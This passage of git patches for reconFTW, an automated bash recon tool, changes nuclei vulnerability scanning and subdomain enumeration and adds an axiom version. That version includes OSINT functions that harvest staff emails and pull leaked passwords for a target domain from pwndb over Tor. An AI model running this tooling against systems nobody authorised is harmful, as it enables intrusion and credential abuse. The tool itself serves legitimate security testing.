nuclei_output/low.txt + printf "${yellow}\n\n Running : Nuclei Medium${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity medium -r $resolvers_trusted -o nuclei_output/medium.txt + printf "${yellow}\n\n Running : Nuclei High${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity high -r $resolvers_trusted -o nuclei_output/high.txt + printf "${yellow}\n\n Running : Nuclei Critical${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity critical -r $resolvers_trusted -o nuclei_output/critical.txt printf "\n\n" end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else @@ -931,7 +923,7 @@ function urlchecks(){ NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) notification "${NUMOFLINES} new urls with params" info end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} - if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/url_extract.txt | wc -l) -le 1000 ]] + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/url_extract.txt | wc -l) -le 1500 ]] then notification "Sending urls to proxy" info eval ffuf -mc all -w webs/url_extract.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD @@ -1598,6 +1590,16 @@ function recon(){ } function multi_recon(){ + + + global_start=`date +%s` + + if [ "$NOTIFICATION" = true ] ; then + NOTIFY="notify -silent" + else + NOTIFY="" + fi + if [ -s "$list" ] then targets=$(cat $list) @@ -1605,14 +1607,16 @@ function multi_recon(){ notification "Target list not provided" error exit fi + workdir=$SCRIPTPATH/Recon/$multi mkdir -p $workdir && cd $workdir - mkdir -p .tmp .called_fn_dir osint subdomains webs hosts vulns + mkdir -p .tmp .called_fn osint subdomains webs hosts vulns for domain in $targets; do dir=$workdir/targets/$domain + called_fn_dir=$dir/.called_fn mkdir -p $dir cd $dir - mkdir -p .tmp .called_fn_dir osint subdomains webs hosts vulns + mkdir -p .tmp .called_fn osint subdomains webs hosts vulns domain_info emails google_dorks @@ -1741,8 +1745,8 @@ while getopts ":hd:-:l:m:x:i:varspxwo:" opt; do ## TARGETS -# m ) multi=$OPTARG -# ;; + m ) multi=$OPTARG + ;; d ) domain=$OPTARG ;; l ) list=$OPTARG From 841031bacedfbde6c3d4e99712a5e033384ccac6 Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 10:57:30 +0200 Subject: [PATCH 11/19] Fix nuclei --- reconftw.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/reconftw.sh b/reconftw.sh index ce16cbc0..13226009 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -998,7 +998,7 @@ function jschecks(){ cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt fi printf "${yellow} Running : Gathering secrets 4/5${reset}\n" - cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD + cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD printf "${yellow} Running : Building wordlist 5/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then From 3117967d0d42349e5ad446d619c3a919e049659d Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 11:06:02 +0200 Subject: [PATCH 12/19] Multi help added --- reconftw.sh | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 13226009..bd244ecd 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -1666,6 +1666,7 @@ function multi_recon(){ done cd $workdir dir=$workdir + domain=$multi end } @@ -1682,7 +1683,7 @@ function help(){ printf "\n [-r] [-s] [-p] [-a] [-w] [-i] [-v] [-h] [--deep] [--fs] [-o OUTPUT]\n\n" printf " ${bblue}TARGET OPTIONS${reset}\n" printf " -d domain.tld Target domain\n" -# printf " -m company Target company name\n" + printf " -m company Target company name\n" printf " -l list.txt Targets list, one per line\n" printf " -x oos.txt Exclude subdomains list (Out Of Scope)\n" printf " -i in.txt Include subdomains list\n" @@ -1710,9 +1711,9 @@ function help(){ printf " Web scanning for subdomain list:\n" printf " ./reconftw.sh -d example.com -l targets.txt -w\n" printf " \n" -# printf " Multidomain recon:\n" -# printf " ./reconftw.sh -m company -l domainlist.txt -r\n" -# printf " \n" + printf " Multidomain recon:\n" + printf " ./reconftw.sh -m company -l domainlist.txt -r\n" + printf " \n" printf " Full recon with custom output and excluded subdomains list:\n" printf " ./reconftw.sh -d example.com -x out.txt -a -o custom/path\n" } From 32bb4a9eedbbbded778d247c25d194f05fa3d54e Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 13:56:06 +0200 Subject: [PATCH 13/19] Gowitness DB added --- reconftw.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index bd244ecd..455ed545 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -667,8 +667,8 @@ function screenshot(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ] then start_func "Web Screenshots" - eval gowitness file -f webs/webs.txt --disable-db --disable-logging $DEBUG_ERROR - eval gowitness file -f webs/webs_uncommon_ports.txt --disable-db --disable-logging $DEBUG_ERROR + eval gowitness file -f webs/webs.txt --disable-logging $DEBUG_ERROR + eval gowitness file -f webs/webs_uncommon_ports.txt --disable-logging $DEBUG_ERROR end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then From a099c2dcf071aa494c14c6ffb97afbd509198118 Mon Sep 17 00:00:00 2001 From: six2dez Date: Tue, 20 Apr 2021 16:51:27 +0200 Subject: [PATCH 14/19] Menu fixes --- reconftw.sh | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 455ed545..b5fe1489 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -533,9 +533,6 @@ function sub_recursive(){ NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) - if [ "$NUMOFLINES" -gt 0 ]; then - notification "${NUMOFLINES} new subdomains found with recursive search" info - fi end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} else notification "Skipping Recursive: Too Much Subdomains" warn @@ -1573,6 +1570,7 @@ function recon(){ subdomains_full subtakeover zonetransfer + s3buckets webprobe_full screenshot favicon @@ -1651,6 +1649,7 @@ function multi_recon(){ portscan cloudprovider + s3buckets waf_checks nuclei_check for domain in $targets; do @@ -1673,8 +1672,10 @@ function multi_recon(){ function subs_menu(){ start subdomains_full + webprobe_full subtakeover zonetransfer + s3buckets end } @@ -1819,6 +1820,8 @@ while getopts ":hd:-:l:m:x:i:varspxwo:" opt; do cp $SCRIPTPATH/$list $dir/webs/webs.txt fi fi + subtakeover + s3buckets waf_checks nuclei_check cms_scanner From 69b6d552bd7540c10bd2d2ae5a24ee9a11d9edef Mon Sep 17 00:00:00 2001 From: six2dez Date: Thu, 22 Apr 2021 07:56:15 +0200 Subject: [PATCH 15/19] Some fixes and tweaks --- reconftw.sh | 17 +- reconftw_axiom.sh | 1859 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 1867 insertions(+), 9 deletions(-) create mode 100755 reconftw_axiom.sh diff --git a/reconftw.sh b/reconftw.sh index b5fe1489..4fbfe7b6 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -378,7 +378,7 @@ function sub_active(){ deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD echo $domain | eval dnsx -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt - NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" @@ -392,7 +392,7 @@ function sub_dns(){ eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt -r $resolvers_trusted $DEBUG_STD cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" @@ -408,7 +408,7 @@ function sub_brute(){ else eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD fi - NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} else if [ "$SUBBRUTE" = false ]; then @@ -425,8 +425,8 @@ function sub_scraping(){ start_subfunc "Running : Source code scraping subdomain search" touch .tmp/scrap_subs.txt cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt - cat subdomains/subdomains.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt - cat subdomains/subdomains.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt + cat .tmp/probed_tmp_scrap.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt + cat .tmp/probed_tmp_scrap.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt if [ "$DEEP" = true ] ; then gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt else @@ -435,7 +435,7 @@ function sub_scraping(){ sed -i '/^.\{2048\}./d' .tmp/gospider.txt cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l) cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} else @@ -497,7 +497,7 @@ function sub_permut(){ if [ -f ".tmp/permute_subs.txt" ] then deleteOutScoped $outOfScope_file .tmp/permute_subs.txt - NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) else NUMOFLINES=0 fi @@ -531,7 +531,7 @@ function sub_recursive(){ eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt - NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} else @@ -1672,7 +1672,6 @@ function multi_recon(){ function subs_menu(){ start subdomains_full - webprobe_full subtakeover zonetransfer s3buckets diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh new file mode 100755 index 00000000..920dfc70 --- /dev/null +++ b/reconftw_axiom.sh @@ -0,0 +1,1859 @@ +#!/usr/bin/env bash + +. ./reconftw.cfg + +function banner(){ + printf "\n${bgreen}" + printf " ██▀███ ▓█████ ▄████▄ ▒█████ ███▄ █ █████▒▄▄▄█████▓ █ █░\n" + printf " ▓██ ▒ ██▒▓█ ▀ ▒██▀ ▀█ ▒██▒ ██▒ ██ ▀█ █ ▓██ ▒ ▓ ██▒ ▓▒▓█░ █ ░█░\n" + printf " ▓██ ░▄█ ▒▒███ ▒▓█ ▄ ▒██░ ██▒▓██ ▀█ ██▒▒████ ░ ▒ ▓██░ ▒░▒█░ █ ░█ \n" + printf " ▒██▀▀█▄ ▒▓█ ▄ ▒▓▓▄ ▄██▒▒██ ██░▓██▒ ▐▌██▒░▓█▒ ░ ░ ▓██▓ ░ ░█░ █ ░█ \n" + printf " ░██▓ ▒██▒░▒████▒▒ ▓███▀ ░░ ████▓▒░▒██░ ▓██░░▒█░ ▒██▒ ░ ░░██▒██▓ \n" + printf " ░ ▒▓ ░▒▓░░░ ▒░ ░░ ░▒ ▒ ░░ ▒░▒░▒░ ░ ▒░ ▒ ▒ ▒ ░ ▒ ░░ ░ ▓░▒ ▒ \n" + printf " ░▒ ░ ▒░ ░ ░ ░ ░ ▒ ░ ▒ ▒░ ░ ░░ ░ ▒░ ░ ░ ▒ ░ ░ \n" + printf " ░░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ \n" + printf " ░ ░ ░░ ░ ░ ░ ░ ░ \n" + printf " ░ \n" + printf " ${reconftw_version}-axiom by @six2dez${reset}\n" +} + +############################################################################################################### +################################################### TOOLS ##################################################### +############################################################################################################### + +function check_version(){ + +eval timeout 10 git fetch $DEBUG_STD +exit_status=$? +if [ $exit_status -eq 0 ] +then + BRANCH=$(git rev-parse --abbrev-ref HEAD) + HEADHASH=$(git rev-parse HEAD) + UPSTREAMHASH=$(git rev-parse ${BRANCH}@{upstream}) + if [ "$HEADHASH" != "$UPSTREAMHASH" ] + then + printf "\n${yellow} There is a new version, run ./install.sh to get latest version${reset}\n\n" + fi +else + printf "\n${bred} Unable to check updates ${reset}\n\n" +fi + +} + +function tools_installed(){ + + printf "\n\n${bgreen}#######################################################################${reset}\n" + printf "${bblue} Checking installed tools ${reset}\n\n" + + allinstalled=true + + [ -n "$GOPATH" ] || { printf "${bred} [*] GOPATH var [NO]${reset}\n"; allinstalled=false;} + [ -n "$GOROOT" ] || { printf "${bred} [*] GOROOT var [NO]${reset}\n"; allinstalled=false;} + [ -n "$PATH" ] || { printf "${bred} [*] PATH var [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/degoogle_hunter/degoogle.py ] || { printf "${bred} [*] degoogle [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/ParamSpider/paramspider.py ] || { printf "${bred} [*] Paramspider [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/brutespray/brutespray.py ] || { printf "${bred} [*] brutespray [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/dnsrecon/dnsrecon.py ] || { printf "${bred} [*] dnsrecon [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/fav-up/favUp.py ] || { printf "${bred} [*] fav-up [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/Corsy/corsy.py ] || { printf "${bred} [*] Corsy [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/testssl.sh/testssl.sh ] || { printf "${bred} [*] testssl [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/CMSeeK/cmseek.py ] || { printf "${bred} [*] CMSeeK [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/ctfr/ctfr.py ] || { printf "${bred} [*] ctfr [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/fuzz_wordlist.txt ] || { printf "${bred} [*] OneListForAll [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/LinkFinder/linkfinder.py ] || { printf "${bred} [*] LinkFinder [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/GitDorker/GitDorker.py ] || { printf "${bred} [*] GitDorker [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/degoogle_hunter/degoogle_hunter.sh ] || { printf "${bred} [*] degoogle_hunter [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/puredns/puredns ] || { printf "${bred} [*] puredns [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/getjswords.py ] || { printf "${bred} [*] getjswords [NO]${reset}\n"; allinstalled=false;} + eval type -P arjun $DEBUG_STD || { printf "${bred} [*] Arjun [NO]${reset}\n"; allinstalled=false;} + eval type -P dirdar $DEBUG_STD || { printf "${bred} [*] dirdar [NO]${reset}\n"; allinstalled=false;} + eval type -P github-endpoints $DEBUG_STD || { printf "${bred} [*] github-endpoints [NO]${reset}\n"; allinstalled=false;} + eval type -P github-subdomains $DEBUG_STD || { printf "${bred} [*] github-subdomains [NO]${reset}\n"; allinstalled=false;} + eval type -P gospider $DEBUG_STD || { printf "${bred} [*] gospider [NO]${reset}\n"; allinstalled=false;} + eval type -P wafw00f $DEBUG_STD || { printf "${bred} [*] wafw00f [NO]${reset}\n"; allinstalled=false;} + eval type -P subfinder $DEBUG_STD || { printf "${bred} [*] Subfinder [NO]${reset}\n"; allinstalled=false;} + eval type -P assetfinder $DEBUG_STD || { printf "${bred} [*] Assetfinder [NO]${reset}\n"; allinstalled=false;} + eval type -P dnsvalidator $DEBUG_STD || { printf "${bred} [*] dnsvalidator [NO]${reset}\n"; allinstalled=false;} + eval type -P gowitness $DEBUG_STD || { printf "${bred} [*] gowitness [NO]${reset}\n"; allinstalled=false;} + eval type -P findomain $DEBUG_STD || { printf "${bred} [*] Findomain [NO]${reset}\n"; allinstalled=false;} + eval type -P amass $DEBUG_STD || { printf "${bred} [*] Amass [NO]${reset}\n"; allinstalled=false;} + eval type -P crobat $DEBUG_STD || { printf "${bred} [*] Crobat [NO]${reset}\n"; allinstalled=false;} + eval type -P mildew $DEBUG_STD || { printf "${bred} [*] mildew [NO]${reset}\n"; allinstalled=false;} + eval type -P waybackurls $DEBUG_STD || { printf "${bred} [*] Waybackurls [NO]${reset}\n"; allinstalled=false;} + eval type -P gauplus $DEBUG_STD || { printf "${bred} [*] gauplus [NO]${reset}\n"; allinstalled=false;} + eval type -P dnsx $DEBUG_STD || { printf "${bred} [*] dnsx [NO]${reset}\n"; allinstalled=false;} + eval type -P DNScewl $DEBUG_STD || { printf "${bred} [*] DNScewl [NO]${reset}\n"; allinstalled=false;} + eval type -P cf-check $DEBUG_STD || { printf "${bred} [*] Cf-check [NO]${reset}\n"; allinstalled=false;} + eval type -P nuclei $DEBUG_STD || { printf "${bred} [*] Nuclei [NO]${reset}\n"; allinstalled=false;} + [ -d ~/nuclei-templates ] || { printf "${bred} [*] Nuclei templates [NO]${reset}\n"; allinstalled=false;} + eval type -P gf $DEBUG_STD || { printf "${bred} [*] Gf [NO]${reset}\n"; allinstalled=false;} + eval type -P Gxss $DEBUG_STD || { printf "${bred} [*] Gxss [NO]${reset}\n"; allinstalled=false;} + eval type -P subjs $DEBUG_STD || { printf "${bred} [*] subjs [NO]${reset}\n"; allinstalled=false;} + eval type -P ffuf $DEBUG_STD || { printf "${bred} [*] ffuf [NO]${reset}\n"; allinstalled=false;} + eval type -P massdns $DEBUG_STD || { printf "${bred} [*] Massdns [NO]${reset}\n"; allinstalled=false;} + eval type -P qsreplace $DEBUG_STD || { printf "${bred} [*] qsreplace [NO]${reset}\n"; allinstalled=false;} + eval type -P interlace $DEBUG_STD || { printf "${bred} [*] interlace [NO]${reset}\n"; allinstalled=false;} + eval type -P anew $DEBUG_STD || { printf "${bred} [*] Anew [NO]${reset}\n"; allinstalled=false;} + eval type -P unfurl $DEBUG_STD || { printf "${bred} [*] unfurl [NO]${reset}\n"; allinstalled=false;} + eval type -P crlfuzz $DEBUG_STD || { printf "${bred} [*] crlfuzz [NO]${reset}\n"; allinstalled=false;} + eval type -P httpx $DEBUG_STD || { printf "${bred} [*] Httpx [NO]${reset}\n${reset}"; allinstalled=false;} + eval type -P jq $DEBUG_STD || { printf "${bred} [*] jq [NO]${reset}\n${reset}"; allinstalled=false;} + eval type -P notify $DEBUG_STD || { printf "${bred} [*] notify [NO]${reset}\n${reset}"; allinstalled=false;} + eval type -P dalfox $DEBUG_STD || { printf "${bred} [*] dalfox [NO]${reset}\n${reset}"; allinstalled=false;} + eval type -P axiom-ls $DEBUG_STD || { printf "${bred} [*] axiom [NO]${reset}\n${reset}"; allinstalled=false;} + + if [ "${allinstalled}" = true ] ; then + printf "${bgreen} Good! All installed! ${reset}\n\n" + else + printf "\n${yellow} Try running the installer script again ./install.sh" + printf "\n${yellow} If it fails for any reason try to install manually the tools missed" + printf "\n${yellow} Finally remember to set the ${bred}\$tools${yellow} variable at the start of this script" + printf "\n${yellow} If nothing works and the world is gonna end you can always ping me :D ${reset}\n\n" + fi + + printf "${bblue} Tools check finished\n" + printf "${bgreen}#######################################################################\n${reset}" +} + +############################################################################################################### +################################################### OSINT ##################################################### +############################################################################################################### + +function google_dorks(){ + if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] && [ "$GOOGLE_DORKS" = true ] && [ "$OSINT" = true ] + then + start_func "Google Dorks in process" + $tools/degoogle_hunter/degoogle_hunter.sh $domain | tee osint/dorks.txt + sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/dorks.txt + end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]} + else + if [ "$GOOGLE_DORKS" = false ] || [ "$OSINT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function github_dorks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$GITHUB_DORKS" = true ] && [ "$OSINT" = true ] + then + start_func "Github Dorks in process" + if [ -s "${GITHUB_TOKENS}" ] + then + if [ "$DEEP" = true ] ; then + eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e $GITDORKER_THREADS -q $domain -p -d $tools/GitDorker/Dorks/alldorksv3 | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD + else + eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e $GITDORKER_THREADS -q $domain -p -d $tools/GitDorker/Dorks/medium_dorks.txt | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD + fi + sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/gitdorks.txt + else + printf "\n${bred} Required file ${GITHUB_TOKENS} not exists or empty${reset}\n" + fi + end_func "Results are saved in osint/gitdorks.txt" ${FUNCNAME[0]} + else + if [ "$GITHUB_DORKS" = false ] || [ "$OSINT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function metadata(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$METADATA" = true ] && [ "$OSINT" = true ] + then + start_func "Scanning metadata in public files" + eval metafinder -d $domain -l 20 -o osint -go -bi -ba $DEBUG_STD + eval mv osint/${domain}/* osint/ $DEBUG_ERROR + eval rmdir osint/${domain} $DEBUG_ERROR + end_func "Results are saved in osint/[software/authors/metadata_results].txt" ${FUNCNAME[0]} + else + if [ "$METADATA" = false ] || [ "$OSINT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function emails(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$EMAILS" = true ] && [ "$OSINT" = true ] + then + start_func "Searching emails/users/passwords leaks" + cd $tools/theHarvester + eval python3 theHarvester.py -d $domain -b all $DEBUG_ERROR > $dir/.tmp/harvester.txt + cd $dir + cat .tmp/harvester.txt | awk '/Emails/,/Hosts/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/emails.txt + cat .tmp/harvester.txt | awk '/Users/,/IPs/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/users.txt + cat .tmp/harvester.txt | awk '/Links/,/Users/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/linkedin.txt + + eval h8mail -t $domain -q domain --loose -c $tools/h8mail_config.ini -j .tmp/h8_results.json $DEBUG_STD + if [ -s ".tmp/h8_results.json" ] + then + cat .tmp/h8_results.json | jq -r '.targets[0] | .data[] | .[]' | cut -d '-' -f2 | anew -q osint/h8mail.txt + fi + + PWNDB_STATUS=$(timeout 15s curl -Is --socks5-hostname localhost:9050 http://pwndb2am4tzkvold.onion | grep HTTP | cut -d ' ' -f2) + + if [ "$PWNDB_STATUS" = 200 ] + then + cd $tools/pwndb + python3 pwndb.py --target "@${domain}" | sed '/^[-]/d' | anew -q $dir/osint/passwords.txt + cd $dir + sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/passwords.txt + else + text="${yellow}\n pwndb is currently down :(\n\n Check xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + fi + end_func "Results are saved in osint/[emails/users/h8mail/passwords].txt" ${FUNCNAME[0]} + else + if [ "$EMAILS" = false ] || [ "$OSINT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + + fi +} + +function domain_info(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$DOMAIN_INFO" = true ] && [ "$OSINT" = true ] + then + start_func "Searching domain info (whois, registrant name/email domains)" + lynx -dump https://domainbigdata.com/${domain} | tail -n +19 > osint/domain_info_general.txt + + cat osint/domain_info_general.txt | grep '/nj/' | tr -s ' ' ',' | cut -d ',' -f3 > .tmp/domain_registrant_name.txt + cat osint/domain_info_general.txt | grep '/mj/' | tr -s ' ' ',' | cut -d ',' -f3 > .tmp/domain_registrant_email.txt + cat 